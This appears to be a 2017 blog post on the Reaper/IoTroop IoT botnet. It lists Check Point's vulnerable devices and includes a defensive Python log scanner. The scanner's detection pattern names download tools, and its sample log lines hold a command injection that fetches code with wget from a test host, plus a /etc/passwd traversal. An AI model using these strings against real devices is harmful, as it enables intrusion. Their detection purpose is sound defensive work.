IoTroop Botnet - Reaper of the Internet

October 24, 2017 Security and Compliance, MOVEit

The spiritual successor to the Mirai botnet is now looming inside millions of IoT devices. Will it wreak havoc on the Internet, or can we stop it in its tracks?

Remember Mirai? I don’t blame you if you can’t. A lot has happened since October 2016, when Mirai’s attack on the DNS provider Dyn made much of the internet unreachable for users on the East Coast of the United States. Since then, WannaCry, NotPetya and the Equifax breach have occupied the news, and cyber attacks are starting to feel commonplace.

Damage Caused By The Mirai Botnet

Mirai built its botnet out of Linux-based IoT devices, such as IP cameras and home routers, that were still using factory-default or otherwise weak credentials. Each compromised device was then directed to flood the target sites with traffic. With more than 100,000 devices enlisted, the combined load on the targets reached 10 to 20 times their normal traffic, producing the largest DDoS attacks seen up to that point.


The attacks started with KrebsOnSecurity, the website of security journalist Brian Krebs, whose servers saw botnet traffic as high as 620 Gbps. Other targets saw traffic approaching 1 Tbps. The botnet then took particular aim at Dyn, a DNS provider based in New Hampshire, and in doing so affected PayPal, Reddit, Netflix, Twitter and many other popular services.

IoTroop or Reaper Looming On The Horizon

Well, it turns out there is another botnet, possibly built on Mirai’s code, that is lying dormant and may take a grip on the Web the likes of which we’ve never seen. It is called Reaper or IoTroop, and the name is fitting: it is enlisting some 10,000 IoT devices a day and could mount an attack that dwarfs Mirai’s.

What’s interesting is that, unlike Mirai, we know about it before it has been unleashed. Check Point Research, the research arm of the Israeli security firm Check Point, posted about the growing botnet last week, and their write-up goes into detail about the worm that is building it.

In a nutshell, this worm spreads from device to device by exploiting known, unpatched vulnerabilities in the devices’ firmware (most of them in the web management interfaces listed below), and it already resides in millions of devices. That is what makes IoTroop different from Mirai: this isn’t a case of poor or default passwords, so a strong password alone does not close the hole.

Below is the full list of affected devices from Check Point Research, grouped by vendor, with Check Point’s protection name for each vulnerability:

GoAhead
    Wireless IP Camera (P2P) WIFICAM Cameras Information Disclosure
    Wireless IP Camera (P2P) WIFICAM Cameras Remote Code Execution

D-Link
    D-Link 850L Router Remote Code Execution
    D-Link DIR800 Series Router Remote Code Execution
    D-Link DIR800 Series Router Information Disclosure
    D-Link 850L Router Remote Unauthenticated Information Disclosure
    D-Link 850L Router Cookie Overflow Remote Code Execution
    Dlink IP Camera Video Stream Authentication Bypass – Ver2
    Dlink IP Camera Luminance Information Disclosure – Ver2
    D-Link DIR-600/300 Router Unauthenticated Remote Command Execution
    Dlink IP Camera Authenticated Arbitrary Command Execution – Ver2

TP-Link
    TP-Link Wireless Lite N Access Point Directory Traversal
    TP-LINK WR1043N Multiple Cross-Site Request Forgery

NETGEAR
    Netgear DGN Unauthenticated Command Execution
    Netgear ReadyNAS Remote Command Execution
    Netgear DGN2200 dnslookup.cgi Command Injection
    Netgear ProSAFE NMS300 fileUpload.do Arbitrary File Upload
    NETGEAR Routers Authentication Bypass
    NETGEAR ReadyNAS np_handler Code Execution
    Netgear R7000 and R6400 cgi-bin Command Injection

AVTECH
    AVTECH Devices Multiple Vulnerabilities

MikroTik
    MikroTik RouterOS SNMP Security Bypass
    MikroTik RouterOS Admin Password Change
    Mikrotik Router Remote Denial Of Service

Linksys
    Belkin Linksys WRT110 Remote Command Execution – Ver2
    Linksys WRH54G HTTP Management Interface DoS Code Execution – Ver2
    Belkin Linksys WRT110 Remote Command Execution
    Belkin Linksys Multiple Products Directory Traversal
    Belkin Linksys E1500/E2500 Remote Command Execution
    Cisco Linksys PlayerPT ActiveX Control Buffer Overflow
    Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow

Synology
    Synology DiskStation Manager SLICEUPLOAD Code Execution

Linux
    Linux System Files Information Disclosure
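Because the worm spreads by hitting these web-interface bugs rather than by guessing passwords, the probes it sends leave a recognisable trail in HTTP access logs. As an added example (not from the original post and not Check Point’s code), here is a small Python heuristic that scans log lines for three things: requests to endpoints named in the list above (dnslookup.cgi, fileUpload.do, cgi-bin), shell metacharacters or download tools inside a request, and directory traversal sequences of the kind behind the TP-Link and Linksys entries. The combined log format, the severity rules and the sample lines are assumptions made for the example; the sample log lines are constructed, not captured traffic.

```python
"""Flag HTTP requests that look like probes for the IoT web-interface bugs in
the list above (CGI command injection, arbitrary file upload, directory
traversal). Heuristic only: a hit means "look at this", not "exploited"."""
import re
from urllib.parse import unquote

# Combined-log-format line, as written by an edge proxy, a honeypot, or a
# router that forwards its web-interface log. Assumed format for the example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Endpoint fragments lifted from the protection names in the list above
# (lower-cased, since the comparison below is case-insensitive).
WATCHED_ENDPOINTS = {
    "dnslookup.cgi": "Netgear DGN2200 dnslookup.cgi Command Injection",
    "fileupload.do": "Netgear ProSAFE NMS300 fileUpload.do Arbitrary File Upload",
    "/cgi-bin/": "Netgear R7000 and R6400 cgi-bin Command Injection",
}

# Shell metacharacters and fetch/connect-back tools that a command-injection
# payload needs. Matched after percent-decoding so %3B is seen as ';'.
SHELL_META = re.compile(r"[;|`&]|\$\(|/bin/sh|\b(?:wget|curl|tftp|telnetd?)\b", re.I)
# A '..' path segment after decoding, covering '../' and its encoded forms.
TRAVERSAL = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")


def classify(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = unquote(unquote(m.group("url")))  # decode twice to catch %25 tricks
    low = url.lower()

    endpoint_hits = [name for frag, name in WATCHED_ENDPOINTS.items() if frag in low]
    payload_hits = []
    if SHELL_META.search(url):
        payload_hits.append("shell metacharacters or download tool in request")
    if TRAVERSAL.search(url):
        payload_hits.append("directory traversal sequence")
    if not endpoint_hits and not payload_hits:
        return None

    # Severity (assumed rules): a watched endpoint plus an injection marker,
    # or a POST/PUT to a watched endpoint (upload), is high; a marker on some
    # other path is medium; a bare GET to a watched endpoint (e.g. normal
    # /cgi-bin/ use) is low and mainly useful for counting per-source probes.
    if endpoint_hits and (payload_hits or m.group("method") in ("POST", "PUT")):
        severity = "high"
    elif payload_hits:
        severity = "medium"
    else:
        severity = "low"

    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "url": m.group("url"),
        "status": int(m.group("status")),
        "severity": severity,
        "reasons": ["endpoint: " + n for n in endpoint_hits] + payload_hits,
    }


def scan(lines):
    """Classify every line, dropping the ones that raise no flag."""
    return [f for f in (classify(l) for l in lines) if f]


# Constructed sample log lines for the example (RFC 5737 test addresses, not
# real capture data). Line 1 mimics a command injection against the
# dnslookup.cgi endpoint, line 2 an upload to fileUpload.do, line 3 a
# traversal attempt, line 4 an ordinary cgi-bin request, line 5 benign traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Oct/2017:03:14:07 +0000] "GET /dnslookup.cgi?host_name=example.com;wget%20http://198.51.100.9/x HTTP/1.1" 200 512',
    '198.51.100.23 - - [20/Oct/2017:03:14:09 +0000] "POST /fileUpload.do HTTP/1.1" 200 90',
    '192.0.2.44 - - [20/Oct/2017:03:15:01 +0000] "GET /help/..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0',
    '192.0.2.10 - - [20/Oct/2017:03:16:30 +0000] "GET /cgi-bin/status HTTP/1.1" 200 2048',
    '192.0.2.11 - - [20/Oct/2017:03:17:00 +0000] "GET /index.html HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["method"], f["url"], "|", "; ".join(f["reasons"]))
```

Run it as-is to see the four flagged lines, or feed it `sys.stdin` from a real log. The endpoint list is deliberately short; a practitioner would extend it from the device models they actually own, and would treat a burst of low-severity hits from one source IP as a scan in progress rather than as noise.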

Can We Stop IoTroop Or Is It Too Late?

Security researchers have caught this botnet in its tracks, so there may be time to stop it before it attacks. A good way to think of these botnets is as a ticking time bomb. If you find the bomb in time, experts have a chance to dismantle it. If it goes unnoticed, you can expect a messy day for the Internet some time in the future.

It isn’t as if these botnets only disrupt the services we use for entertainment and social media. Our world is so wired into web services that when they are taken down en masse, the effects reach critical infrastructure such as the electrical grid and hospitals.

What you can do now is patch all of your IoT devices and routers: apply the vendor’s latest firmware, and replace devices the vendor no longer updates. Changing default passwords on home IoT devices (routers, IP cameras, etc.) is still worth doing, because it defeats Mirai-style credential attacks, but Reaper spreads through the firmware vulnerabilities listed above, so a password change alone will not keep it out. Keep the management interfaces of these devices off the public internet as well. An infected device won’t harm you personally or your hardware, but the consequences will be much larger if Reaper isn’t thwarted.

Greg Mooney

Greg is a technologist and data geek with over 10 years in tech. He has worked in a variety of industries as an IT manager and software tester. Greg is an avid writer on everything IT related, from cyber security to troubleshooting.
